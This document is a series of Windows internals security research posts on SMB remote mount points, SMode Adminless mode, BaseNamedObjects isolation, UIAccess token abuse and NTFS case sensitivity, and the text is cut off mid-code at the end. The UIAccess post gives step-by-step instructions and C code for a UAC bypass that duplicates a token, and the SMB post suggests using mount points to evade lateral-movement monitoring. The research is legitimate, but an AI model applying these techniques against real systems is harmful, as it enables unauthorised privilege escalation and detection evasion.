I used IDA to look for immediate values of IO_REPARSE_TAG_SYMLINK, which is 0xA000000C. It seemed likely that any check would first look for that value along with any other checking for the other tags. In the driver from Windows 10 1809 there was only one hit, in Smb2ValidateIoctl. The code is roughly as follows:

NTSTATUS Smb2ValidateIoctl(SmbIoctlRequest* request) {
  // ...
  switch (request->IoControlCode) {
    case FSCTL_SET_REPARSE_POINT: {
      REPARSE_DATA_BUFFER* reparse = (REPARSE_DATA_BUFFER*)request->Buffer;
      // Validate length etc.
      if (reparse->ReparseTag != IO_REPARSE_TAG_SYMLINK &&
          !request->SomeOffset->SomeByteValue) {
        return STATUS_ACCESS_DENIED;
      }
      // Complete FSCTL_SET_REPARSE_POINT request.
    }
  }
}

The code extracts the data from the IOCTL request and fails with STATUS_ACCESS_DENIED if the tag is not IO_REPARSE_TAG_SYMLINK and some byte value is 0, which is referenced from the request data. Tracking down who sets this value can be tricky sometimes; however I usually have good results by just searching for the variable's offset as an immediate value in IDA, in this case 0x200, and going through the results looking for likely MOV instructions. I found an instruction "MOV [RCX+0x200], AL" inside Smb2ExecuteSessionSetupReal which looked to be the one. The variable is being set with the result of a call to Smb2IsAdmin which just checks if the caller has the BUILTIN\Administrators group in their token. It seems that we can set arbitrary reparse points on a remote share, as long as we're an administrator on the machine. We should still test that's really the case:
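For reference, the test is something like the following; from memory the tool takes the mount point path followed by the target, so double check its usage output:

C:\> CreateMountPoint \\localhost\c$\abc c:\
C:\> dir \\localhost\c$\abc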

Using CreateMountPoint on \\localhost\c$\abc is successful and listing the directory showing the windows folder.


Testing from an administrator account allows us to create the mount point, and when listing the directory from a UNC path the Windows folder is shown. While I've demonstrated this on local admin shares this will work on any share, and the mount point is followed on the remote server.

Is this trick useful? Requiring administrator access does mean it's not something you could abuse for local privilege escalation, and if you have administrator access remotely there's almost certainly nastier things you could do. Still, it could be useful if the target machine has the admin shares disabled, or there's monitoring in place which would detect the use of ADMIN$ or C$ in lateral movement; if there's any other writable share you could add a mount point which would give full control over any other fixed drive.

I can't find anyone documenting this before, but I could have missed it as the search results are heavily biased towards SAMBA configurations when you search for SMB and mount points (for obvious reasons). This trick is another example of ensuring you test any assumptions about the security behavior of a system, as it's probably not documented what the actual behavior is. Even though a tool such as MKLINK claims a lack of support for setting remote mount points, by digging into the available specification and looking at the code itself you can find some interesting stuff.

Enabling Adminless Mode on Windows 10 SMode

Microsoft has always been pretty terrible at documenting new and interesting features for their System Integrity Policy used to enable security features like UMCI, Device Guard/Windows Defender Application Control etc. This short blog post is about another feature which seems to be totally undocumented*, but has been available in Windows 10 since 1803: Adminless mode.

* No doubt Alex Ionescu will correct me on this point if I'm wrong.

TL;DR; Windows 10 SMode has an Adminless mode which fails any access check which relies on the BUILTIN\Administrators group. This is somewhat similar to macOS's System Integrity Protection in that the Administrator user cannot easily modify system resources. You can enable it by setting the DWORD value SeAdminlessEnforcementModeEnabled in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel to 1 on Windows 10 1809 SMode. I'd not recommend setting this value on a working SMode system as you might lock yourself out of the computer.
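For reference, a minimal sketch of setting that value from an elevated PowerShell prompt, using the value name given above (and again, don't do this on a machine you care about):

PS C:\> New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel' -Name SeAdminlessEnforcementModeEnabled -PropertyType DWord -Value 1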

If you look at the kernel in 1803 and above, at the API SeAccessCheck (and similar), you'll see it now calls the method SeAccessCheckWithHintWithAdminlessChecks. The Adminless part is new, but what is Adminless and how is it enabled? Let's see some code, derived from 1809 [complexity reduced for clarity]:

BOOLEAN SeAccessCheck(PSECURITY_DESCRIPTOR SecurityDescriptor,
                      PSECURITY_SUBJECT_CONTEXT SubjectSecurityContext,
                      BOOLEAN SubjectContextLocked,
                      ACCESS_MASK DesiredAccess,
                      ACCESS_MASK PreviouslyGrantedAccess,
                      PPRIVILEGE_SET* Privileges,
                      PGENERIC_MAPPING GenericMapping,
                      KPROCESSOR_MODE AccessMode,
                      PACCESS_MASK GrantedAccess,
                      PNTSTATUS AccessStatus) {
  BOOLEAN AdminlessCheck = FALSE;
  PTOKEN Token = SeQuerySubjectContextToken(SubjectSecurityContext);
  DWORD Flags;
  BOOLEAN Result;

  // Query the CI lockdown flags, then check for an admin, non-SYSTEM token.
  SeCodeIntegrityQueryPolicyInformation(205, &Flags, sizeof(Flags));
  if (Flags & 0xA0000000) {
    AdminlessCheck = SeTokenIsAdmin(Token) &&
        !RtlEqualSid(SeLocalSystemSid, Token->UserAndGroups->Sid);
  }

  if (AdminlessCheck) {
    Result = SeAccessCheckWithHintWithAdminlessChecks(...,
        GrantedAccess, AccessStatus, TRUE);
    if (Result) {
      return TRUE;
    }
    if (SepAccessStatusHasAccessDenied(GrantedAccess, AccessStatus)
        && SeAdminlessEnforcementModeEnabled) {
      SepLogAdminlessAccessFailure(...);
      return FALSE;
    }
  }
  return SeAccessCheckWithHintWithAdminlessChecks(..., FALSE);
}

The code has three main parts. First a call is made to SeCodeIntegrityQueryPolicyInformation to look up system information class 205 from the CI module. Normally these information classes are also accessible through NtQuerySystemInformation, however 205 is not actually wired up in 1809, therefore you can't query the flags from user-mode directly. If the flags returned have bit 31 or 29 set, then the code tries to determine if the token being used for the access check is an admin (is the token a member of the BUILTIN\Administrators group?) and that it's not a SYSTEM token based on the user SID.

If the token is not an admin, or it's a SYSTEM token, then the second block is skipped. The SeAccessCheckWithHintWithAdminlessChecks method is called with the access check arguments and a final argument of FALSE, and the result returned. This is the normal control flow for the access check. If the second block is instead entered, SeAccessCheckWithHintWithAdminlessChecks is called with the final argument set to TRUE. This final argument is what determines whether Adminless checks are enabled, but not whether the checks are enforced. We'll see what the checks are in a minute, but first let's continue here. Finally in this block SepAccessStatusHasAccessDenied is called, which takes the granted access and the NTSTATUS code from the check and determines whether the access check failed with access denied. If the global variable SeAdminlessEnforcementModeEnabled is also TRUE then the code will log an optional ETW event and return FALSE, indicating the check has failed. If Adminless mode is not enabled the normal non-Adminless check is made.

There are two immediate questions you might ask: first, where do the CI flags get set, and second, how do you set SeAdminlessEnforcementModeEnabled to TRUE? The latter is easy: by creating a DWORD registry value set to 1 in "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel" with the name AdminlessEnforcementModeEnabled the kernel will set that global variable to TRUE. The CI flags are slightly more complicated: the call to SeCodeIntegrityQueryPolicyInformation drills down to SIPolicyQueryWindowsLockdownMode inside the CI module, which looks like the following:

void SIPolicyQueryWindowsLockdownMode(PULONG LockdownMode) {
  SIPolicyHandle Policy;
  if (SIPolicyIsPolicyActive(7, &Policy)) {
    ULONG Options;
    SIPolicyGetOptions(Policy, &Options, NULL);
    if ((Options >> 6) & 1)
      *LockdownMode |= 0x80000000;
    else
      *LockdownMode |= 0x20000000;
  } else {
    *LockdownMode |= 0x40000000;
  }
}

The code queries whether policy 7 is active. Policy 7 corresponds to the system integrity policy file loaded from WinSIPolicy.p7b (see g_SiPolicyTypeInfo in the CI module), which is the policy file used by SMode (what used to be Windows 10S). If policy 7 is active then, depending on an additional option flag, either bit 31 or bit 29 is set in the LockdownMode parameter. If policy 7 is not active then bit 30 is set. Therefore what the call in SeAccessCheck is checking for is basically whether the current system is running Windows in SMode. We can see this more clearly by looking at 1803 which has slightly different code:

if (!g_sModeChecked) {
  SYSTEM_CODE_INTEGRITY_POLICY Policy = {};
  ZwQuerySystemInformation(SystemCodeIntegrityPolicyInformation,
                           &Policy, sizeof(Policy));
  g_inSMode = Policy.Options & 0xA0000000;
  g_sModeChecked = TRUE;
}

The code in 1803 makes it clear that if bit 29 or 31 is set then the system is considered to be SMode. This code also uses ZwQuerySystemInformation instead of SeCodeIntegrityQueryPolicyInformation to extract the flags, via the SystemCodeIntegrityPolicyInformation information class. We can call this instead of information class 205 using NtObjectManager. We can see in the screenshot below that on a non-SMode system calling NtSystemInfo::CodeIntegrityPolicy has Flag40000000 set, which would not be considered SMode.
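In PowerShell the query from the screenshots is something like the following one-liner, assuming the NtSystemInfo::CodeIntegrityPolicy static property shown in the captions is exposed from the module's NtApiDotNet assembly:

PS C:\> [NtApiDotNet.NtSystemInfo]::CodeIntegrityPolicy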

Calling NtSystemInfo::CodeIntegrityPolicy in Powershell on a non-SMode system showing Flag40000000

In contrast on an SMode installation we can see Flag20000000 is set instead. This means it's ready to enable Adminless mode.

Calling NtSystemInfo::CodeIntegrityPolicy in Powershell on a SMode system showing Flag20000000

We now know how to enable Adminless mode, but what is the mode enforcing? The final parameter to SeAccessCheckWithHintWithAdminlessChecks is forwarded to other methods. For example the method SepSidInTokenSidHash has been changed. This method checks whether a specific SID is in the list of a token's group SIDs, which is used for various purposes. For example when checking the DACL each ACE is enumerated and SepSidInTokenSidHash is called with the SID from the ACE and the token's group list. If the SID is in the group list the access check handles the ACE according to type and updates the current granted access. The change for Adminless looks like the following:

BOOLEAN SepSidInTokenSidHash(PSID_AND_ATTRIBUTES_HASH SidAndHash,
                             PSID Sid,
                             BOOLEAN AdminlessCheck) {
  // Fail immediately if checking the Administrators group in Adminless mode.
  if (AdminlessCheck && RtlEqualSid(SeAliasAdminsSid, Sid))
    return FALSE;
  // ...
  return TRUE;
}

Basically if the AdminlessCheck argument is TRUE and the SID to check is BUILTIN\Administrators then fail immediately. This check is repeated in a number of other places as well. The net result is Administrators (except for SYSTEM, which is needed for system operation) can no longer access a resource based on being a member of the Administrators group. As far as I can tell it doesn't block privilege checks, so if you were able to run under a token with "GOD" privileges such as SeDebugPrivilege you could still circumvent the OS security. However you need to be running with High Integrity to use the most dangerous privileges, which you won't get as a normal user.

I don't really know what the use case for this mode is; at least it's not currently on by default in SMode. As it's not documented anywhere I could find I assume it's also not something Microsoft is expecting users/admins to enable. The only thoughts I had were kiosk style systems, or Hyper-V containers where you want to block all administrator access. If you were managing a fleet of SMode devices you could also enable this to make it harder for a user to run code as admin, however it wouldn't do much if you had a privilege escalation to SYSTEM.

This sounds similar in some ways to System Integrity Protection/SIP/rootless on macOS in that it limits the ability of a user to modify the system, except rather than a flag which indicates a resource can be modified like on macOS, an administrator could still modify a resource as long as they have another group to use. Perhaps eventually Microsoft might document this feature, considering the deep changes to access checking it required. Then again, knowing Microsoft, probably not.

A Brief History of BaseNamedObjects on Windows NT

Recently I RE'd some new undocumented feature in Windows which I thought I should put in a short blog post. To expand it out slightly this blog will be a brief history of BaseNamedObjects (BNO from now on) from Windows NT 3.1 to modern Windows 10.

TL;DR; New versions of Windows 10 have a BaseNamedObjects isolation feature when creating a non-sandbox process which allows an application to redirect named objects transparently to a non-shared location. I've added support for the feature in NtObjectManager v1.1.19.

Just to get you up to speed, what is BNO? The majority of Windows NT kernel objects can be assigned names. The named objects are added to the Object Manager Namespace, a hierarchical object based file system. When calling a native system call such as NtCreateEvent you can specify an OBJECT_ATTRIBUTES structure which can include a full path to the object location. However, if you're calling a Win32 API it's typical to only be provided with a simple name, as demonstrated by the CreateEvent lpName parameter.

Screenshot showing CreateEventW prototype with an lpName parameter which specifies the object name.
As you can't provide a full path the question might be: where does the object get created? In NT 3.1 the kernel sets up a special \BaseNamedObjects directory when it starts. When you call CreateEvent the KERNEL32 library appends the name to the object directory to get the full path*. The end result is you create your named event at the location \BaseNamedObjects\{lpName}. We can use my NtObjectManager PowerShell module to list the BaseNamedObjects directory on a modern system by listing the drive NtObject:\BaseNamedObjects, as shown below.

* This isn't strictly how the library handles redirecting the name, but it's good enough for this post.
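Concretely, the listing shown in the screenshot below is just something like the following, with a couple of properties selected for brevity:

PS C:\> ls NtObject:\BaseNamedObjects | Select Name, TypeName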

PowerShell console showing listing of ntobject:\BaseNamedObjects.

The BNO directory was shared by all users on the system, which for NT 3.1 meant system services and the user logged into the physical console. While there are some security implications with sharing this global location for all named objects, this wasn't a big concern back in 1993.

This global approach hit a problem with the introduction of Terminal Services in Windows 2000 (it was available in NT4 but as an extension). Specifically, now that you could have multiple "normal" users logged on at the same time on a single system, you ran the risk of name collisions, making one app impossible to run if another user had already started it and grabbed the name of the event or similar. Not discounting the increased security risk of sharing these resources. To remedy this problem when a new user logs into a Terminal Server a new instance of CSRSS is started and creates a new directory \Sessions\{ID}\BaseNamedObjects where {ID} maps to the Session identifier, just an integer value.

Due to the way the original Win32 APIs were designed adding a new directory could be made transparent. Instead of mapping the name parameter to the global BNO the KERNEL32 library could look up the session ID and create the session specific name. If the session ID is 0, indicating the physical console and service session, the name is still mapped to the global BNO; anything else is mapped to the per-session directory. It would still be useful for an application to create or open entries in the global BNO, so CSRSS also creates a symbolic link, Global, which maps to the global location. Therefore if you pass the name Global\NAME it will actually create the named object inside the global BNO. There's also a corresponding Local symbolic link, which just maps back to the per-session directory. In NtObjectManager you can list the per-session BNO through the SessionNtObject: drive as shown below:

Listing SessionNtObject:\ directory in PowerShell and selecting out symbolic links with the filter "? IsSymbolicLink".

Not much changed in Windows XP, other than Terminal Services being made available in consumer facing versions of the OS; it was used to implement Fast User Switching for example. The next evolution of BNO was in Vista. First, Session 0 became the preserve of system services, instead of being shared with the physical console. All user login sessions placed their named objects in a per-session BNO whether the user connected locally or remotely. The more interesting change was the introduction of private namespaces, exposed through the CreatePrivateNamespace API.

The API allows an application to create its own private BNO. Through the use of a "Boundary Descriptor" it is also possible to share it securely with other applications if they have the correct parameters. This private BNO doesn't override the application's BNO; instead the APIs provide an lpAliasPrefix parameter, which you can use to prefix your object names. For example if you create a namespace with the "Flubber" prefix, then you can create or open objects by specifying "Flubber\{NAME}" and KERNEL32 will automatically resolve it to the correct location. NtObjectManager exposes private namespaces through the Get-NtDirectory and New-NtDirectory commands with the PrivateNamespaceDescriptor parameter (read the help for more information on its structure). You can also map the private namespace as a drive using the New-PSDrive command and specifying a root name of "ntpriv:{BOUNDARY}" where {BOUNDARY} is the boundary descriptor string, as shown below:
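Spelled out, the commands from the screenshot below are:

PS C:\> New-NtDirectory -PrivateNamespaceDescriptor FLUBBER
PS C:\> New-PSDrive -Name flubber -PSProvider NtObjectManager -Root ntpriv:FLUBBER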

Creating a new Private Namespace with "New-NtDirectory -PrivateNamespaceDescriptor FLUBBER". Then mapping it as a drive with "New-PSDrive -Name flubber -PSProvider NtObjectManager -Root ntpriv:FLUBBER"
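For reference, here's roughly what the native API usage looks like; a minimal sketch, assuming an everyone-SID boundary and the example "Flubber" prefix from above:

#include <windows.h>

int main(void) {
    // Build a boundary descriptor; the name and SID are example parameters.
    HANDLE boundary = CreateBoundaryDescriptorW(L"FLUBBER", 0);
    BYTE sid_buffer[SECURITY_MAX_SID_SIZE];
    DWORD sid_size = sizeof(sid_buffer);
    CreateWellKnownSid(WinWorldSid, NULL, sid_buffer, &sid_size);
    AddSIDToBoundaryDescriptor(&boundary, (PSID)sid_buffer);

    // Create the private BNO with an alias prefix of "Flubber".
    HANDLE ns = CreatePrivateNamespaceW(NULL, boundary, L"Flubber");

    // Names with the Flubber\ prefix now resolve into the private BNO.
    HANDLE event = CreateEventW(NULL, FALSE, FALSE, L"Flubber\\MyEvent");

    CloseHandle(event);
    ClosePrivateNamespace(ns, 0);
    DeleteBoundaryDescriptor(boundary);
    return 0;
}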

Private namespaces are used in a few locations, such as IE/Edge, but on the whole they're not that popular, perhaps because they require explicit code changes to add the new prefix.

The next step in BNO history was introduced in Windows 8 to support the AppContainer (AC) sandbox. Supporting named objects in a sandbox using built-in functionality is difficult to get right: first, you don't really want a sandboxed application manipulating a more privileged application's named objects; second, you don't want one AC application manipulating another AC's named objects, as some sandboxes have more access than others. Avoiding both of these problems made a global BNO location pretty much a non-starter. Instead, MS added code to automatically detect if an application is in an AC sandbox and redirect the named objects transparently to \Sessions\{ID}\AppContainerNamedObjects\{SID}, where {SID} is the SDDL form of the AC's package SID. The non-sandboxed process creates the directory before starting the AC process, and it's ACL'ed so only that package can modify it. This solves the problem neatly, and again is a testament to the original design of hiding the real underlying object naming from the Win32 API layer.

Listing the AppContainerNamedObjects directory with "ls ntobject:\Sessions\9\AppContainerNamedObjects".

Finally we get to the last part, the area I was RE'ing. Windows 10 RS3 introduced a new undocumented feature, BNO Isolation. When I say it's undocumented, I can't find any public reference to it, and the expected definitions don't appear in the Windows SDK headers. Of course there seem to be some structures in the Process Hacker source code for the native format, but I try to avoid asking where exactly that's come from ;-)

Anyway, I think the name of the feature pretty much gives away its purpose. It allows a process to create an isolated BNO directory without being in an AC or requiring you to use a private namespace and the accompanying prefix. It's set up by specifying the name of the isolation directory in the ProcThreadAttributeBnoIsolation process/thread attribute when creating a new process. From the Win32 level you only need to specify the name; internally CreateProcess creates the appropriate BNO directory and supporting symbolic links. At the native level the prefix name and a list of handles to capture is passed to NtCreateUserProcess, and this information is stored in the process token. KERNEL32 can then query for the isolation prefix using the TokenBnoIsolation information class (which is documented, sort of) when setting up its BNO directory, and all named objects are redirected to this new location. I've exposed the BNO prefix in NtObjectManager with the BnoIsolationPrefix property on the token object. You can set up a new process with BNO isolation by setting the BnoIsolationPrefix property on the Win32ProcessConfig object. For example:

Creating a new process with a BnoIsolationPrefix value in Win32ProcessConfig. Then listing the new directory under Sessions\9\BaseNamedObjects\Flubber.

The isolated name gets created under the per-session BNO. If you want true isolation you probably want to name the directory with a unique random GUID. Note that the isolation prefix is not inherited across process creation, which is a bit of a shame as it limits the feature's usefulness. Still, I could see it being used to run arbitrary applications in a slightly more isolated fashion; shame it's not really documented.
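If you don't want to use NtObjectManager, here's a sketch of querying the prefix natively. The TOKEN_BNO_ISOLATION_INFORMATION structure and TokenBnoIsolation class do appear in recent SDK headers, but treat the exact layout as an assumption on older SDKs:

#include <windows.h>
#include <stdio.h>

int main(void) {
    HANDLE token;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token))
        return 1;

    // Two-call dance: the returned buffer contains the structure followed
    // by the prefix string which IsolationPrefix points into.
    DWORD size = 0;
    GetTokenInformation(token, TokenBnoIsolation, NULL, 0, &size);
    PTOKEN_BNO_ISOLATION_INFORMATION info =
        (PTOKEN_BNO_ISOLATION_INFORMATION)LocalAlloc(LPTR, size);
    if (info && GetTokenInformation(token, TokenBnoIsolation,
                                    info, size, &size)) {
        wprintf(L"Enabled: %d Prefix: %s\n", info->IsolationEnabled,
                info->IsolationPrefix ? info->IsolationPrefix : L"(none)");
    }
    LocalFree(info);
    CloseHandle(token);
    return 0;
}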

There ends the brief history of BNO in Windows NT. While BNO isolation doesn't immediately look interesting from a security perspective, I can imagine it could find some use in process isolation and containment.

Accessing Access Tokens for UIAccess

I mentioned in a previous blog post (link) that Windows RS5 finally kills, as far as I can tell, the abuse of Access Tokens to elevate to admin just by opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people haven't been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess, even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess.

TL;DR: you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github.

First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process to interact with the windows of a higher integrity level process, preventing a malicious application automating a privileged UI to elevate privileges. There have of course been some holes discovered over the years, but the fundamental principle is sound. However there's a big problem: what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, which won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was a backdoor to UIPI: a special flag on Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed.

From an escalation perspective, if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt, and use that access to bypass further UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and passing the TokenUIAccess information class. If you try that you'll find you can't set the flag as a normal user; you need SeTcbPrivilege, which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag, how does UIAccess get set in normal operation?

Using Get-NtToken to get a token and checking the UIAccess property. Setting it to true causes an exception requesting a privilege.
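Here's the same experiment in C; a minimal sketch which should fail with ERROR_PRIVILEGE_NOT_HELD when run as a normal user:

#include <windows.h>
#include <stdio.h>

int main(void) {
    HANDLE token;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_DEFAULT | TOKEN_QUERY, &token))
        return 1;

    DWORD ui_access = 1;
    if (!SetTokenInformation(token, TokenUIAccess,
                             &ui_access, sizeof(ui_access))) {
        // Expect ERROR_PRIVILEGE_NOT_HELD (1314) without SeTcbPrivilege.
        printf("SetTokenInformation failed: %lu\n", GetLastError());
    }
    CloseHandle(token);
    return 0;
}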

You need to get the AppInfo service to spawn your process with an appropriate set of flags, or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege it can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess, no UAC prompt will show (otherwise what's the point?). The AppInfo service normally spawns admin UAC processes; however, by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. It's not quite that simple though: as per this link you also need to sign the executable (easy, as it can be self-signed), but the executable must also be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process and then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process.

Of course there are bugs; for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. UACME also has an exploit which abuses UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score, UIAccess is a property of the access token. As the OS doesn't do anything special to clear it you can open the token from an existing UIAccess process, take its token, create a new process with that token and start automating the heck out of privileged windows ;-)

In summary, here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below (a condensed C sketch follows the list).
  1. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done relatively silently.
  2. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC), although on Windows 10 RS5 some other sandbox mitigations get in the way at the next step; it should still work on Windows 7.
  3. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token.
  4. Set the new token's integrity to match your current token's integrity.
  5. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag.
  6. Automate the UI to your heart's desire.
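Here's a condensed, hedged C sketch of steps 2 through 5. Error handling is elided, and I'm assuming the caller is a normal medium integrity process (hence the medium label in step 4):

#include <windows.h>

// pid: the process ID of an existing UIAccess process such as OSK.EXE.
BOOL SpawnUIAccessProcess(DWORD pid, LPWSTR cmdline) {
    HANDLE process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION,
                                 FALSE, pid);
    HANDLE token, primary;
    OpenProcessToken(process, TOKEN_DUPLICATE, &token);
    // Duplicate to a writable primary token (step 3).
    DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation,
                     TokenPrimary, &primary);

    // Drop the token integrity to medium to match the caller (step 4).
    BYTE sid[SECURITY_MAX_SID_SIZE];
    DWORD sid_size = sizeof(sid);
    CreateWellKnownSid(WinMediumLabelSid, NULL, sid, &sid_size);
    TOKEN_MANDATORY_LABEL label = { { (PSID)sid, SE_GROUP_INTEGRITY } };
    SetTokenInformation(primary, TokenIntegrityLevel, &label,
                        sizeof(label) + GetLengthSid((PSID)sid));

    // Spawn a new process with the UIAccess token (step 5).
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    return CreateProcessAsUserW(primary, NULL, cmdline, NULL, NULL, FALSE,
                                0, NULL, NULL, &si, &pi);
}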
Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate? For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop, and so it's permitted to be assigned as a primary token as long as the integrity is dropped to be equal to or lower than the current integrity.

As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope).

Screenshot showing the results of the script with notepad run elevated via an elevated command prompt.

There's almost certainly other tricks you can do once you've got UIAccess. For example if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself.

In conclusion, while the old admin token stealing trick went away, it doesn't mean the technique no longer has value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course, as it's not a security boundary and is so full of holes, I'm not sure anyone cares about it :-)

NTFS Case Sensitivity on Windows

Back in February 2018 Microsoft released an interesting blog post (link) which introduced per-directory case-sensitive NTFS support. MS have been working on making support for WSL more robust, and interop between the Linux and Windows sides of things started off a bit rocky. Of special concern was the different semantics between traditional Unix-like file systems and Windows NTFS.

I always keep an eye out for new Windows features which might have security implications, and per-directory case sensitivity certainly caught my attention. With 1903 not too far off I thought it was time I actually did a short blog post about per-directory case-sensitivity and mulled over some of the security implications. While I'm at it, why not go on a whistle-stop tour of case sensitivity in Windows NT over the years.

Disclaimer. I don't currently and have never previously worked for Microsoft so much of what I'm going to discuss is informed speculation.

The Early Years

The Windows NT operating system has had the ability to have case-sensitive files since the very first version. This is because of the OS's well known, but little used, POSIX subsystem. If you look at the documentation for CreateFile you'll notice a flag, FILE_FLAG_POSIX_SEMANTICS which is used for the following purposes:

"Access will occur according to POSIX rules. This includes allowing multiple files with names, differing only in case, for file systems that support that naming."

It makes sense, therefore, that all you'd need to do to get a case-sensitive file system is use this flag exclusively. Of course, being an optional flag, it's unlikely that the majority of Windows software uses it correctly. You might wonder what the flag is actually doing, as CreateFile is not a system call. If we dig into the code inside KERNEL32 we'll find the following:

BOOL CreateFileInternal(LPCWSTR lpFileName, ..., DWORD dwFlagsAndAttributes) {
    // ...
    OBJECT_ATTRIBUTES ObjectAttributes;
    if (dwFlagsAndAttributes & FILE_FLAG_POSIX_SEMANTICS) {
        ObjectAttributes.Attributes = 0;
    } else {
        ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    }
    NtCreateFile(..., &ObjectAttributes, ...);
}

This code shows that if the FILE_FLAG_POSIX_SEMANTICS flag is set, the Attributes member of the OBJECT_ATTRIBUTES structure passed to NtCreateFile is initialized to 0; otherwise it's initialized with the flag OBJ_CASE_INSENSITIVE. The OBJ_CASE_INSENSITIVE flag instructs the Object Manager to do a case-insensitive lookup for a named kernel object. However, files do not directly get parsed by the Object Manager, so the IO manager converts this flag to the IO_STACK_LOCATION flag SL_CASE_SENSITIVE before handing it off to the file system driver in an IRP_MJ_CREATE IRP. The file system driver can then honour that flag or not; in the case of NTFS it honours it and performs a case-sensitive file search instead of the default case-insensitive search.

Aside. Specifying FILE_FLAG_POSIX_SEMANTICS supports one other additional feature of CreateFile that I can see. By specifying FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_POSIX_SEMANTICS and FILE_ATTRIBUTE_DIRECTORY in the dwFlagsAndAttributes parameter and CREATE_NEW as the dwCreationDisposition parameter, the API will create a new directory and return a handle to it. This would normally require calling CreateDirectory, then making a second call to open the directory, or using the native NtCreateFile system call directly.
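A quick sketch of that trick; the path is just an example:

#include <windows.h>

int main(void) {
    // Create a new directory and get a handle back in a single call.
    HANDLE dir = CreateFileW(L"C:\\Temp\\NewDir", GENERIC_READ, 0, NULL,
                             CREATE_NEW,
                             FILE_FLAG_BACKUP_SEMANTICS |
                             FILE_FLAG_POSIX_SEMANTICS |
                             FILE_ATTRIBUTE_DIRECTORY, NULL);
    if (dir == INVALID_HANDLE_VALUE)
        return 1;
    CloseHandle(dir);
    return 0;
}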

NTFS has always supported case-preserving operations, so creating the file AbC.txt will leave the case intact. However, when it performs the initial check to make sure the file doesn't already exist, a request for abc.TXT would find the existing file during a case-insensitive search. If the create is done case-sensitively then NTFS won't find the file and you can now create the second file. This allows NTFS to support full case-sensitivity.

It seems too simple to create files in a case-sensitive manner: just use the FILE_FLAG_POSIX_SEMANTICS flag, or don't pass OBJ_CASE_INSENSITIVE to NtCreateFile. Let's try that using PowerShell on a default installation of Windows 10 1809 to see if that's really the case.

Opening the file AbC.txt with OBJ_CASE_INSENSITIVE and without.

First we create a file with the name AbC.txt; as NTFS is case preserving this will be the name assigned to it in the file system. We then open the file, first with the OBJ_CASE_INSENSITIVE attribute flag set and specifying the name all in lowercase. As expected we open the file, and displaying the name shows the case-preserved form. Next we do the same operation without the OBJ_CASE_INSENSITIVE flag; however, unexpectedly, it still works. It seems the kernel is just ignoring the missing flag and doing the open case-insensitively.

It turns out this is by design: as case-insensitive operation is defined as opt-in, no one would ever correctly set the flag and the whole edifice of the Windows subsystem would probably quickly fall apart. Therefore enabling support for case-sensitive operation is gated behind a Session Manager kernel registry value, ObCaseInsensitive. This registry value is reflected in the global kernel variable ObpCaseInsensitive, which is set to TRUE by default. There's only one place this variable is used, ObpLookupObjectName, which looks like the following:

NTSTATUS ObpLookupObjectName(POBJECT_ATTRIBUTES ObjectAttributes, ...) {
    // ...
    DWORD Attributes = ObjectAttributes->Attributes;
    if (ObpCaseInsensitive) {
        Attributes |= OBJ_CASE_INSENSITIVE;
    }
    // Continue lookup.
}

From this code we can see that if ObpCaseInsensitive is set to TRUE then, regardless of the Attribute flags passed to the lookup operation, OBJ_CASE_INSENSITIVE is always set. What this means is that no matter what you do you can't perform a case-sensitive lookup operation on a default install of Windows. Of course, if you installed the POSIX subsystem you'll typically find the kernel variable set to FALSE, which would enable case-sensitive operation for everyone, at least if they forget to set the flags.
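You can check the state of the registry value with a few lines of C; the value lives under the Session Manager's kernel key (I'm assuming it's present as a REG_DWORD):

#include <windows.h>
#include <stdio.h>

int main(void) {
    DWORD value = 0, size = sizeof(value);
    if (RegGetValueW(HKEY_LOCAL_MACHINE,
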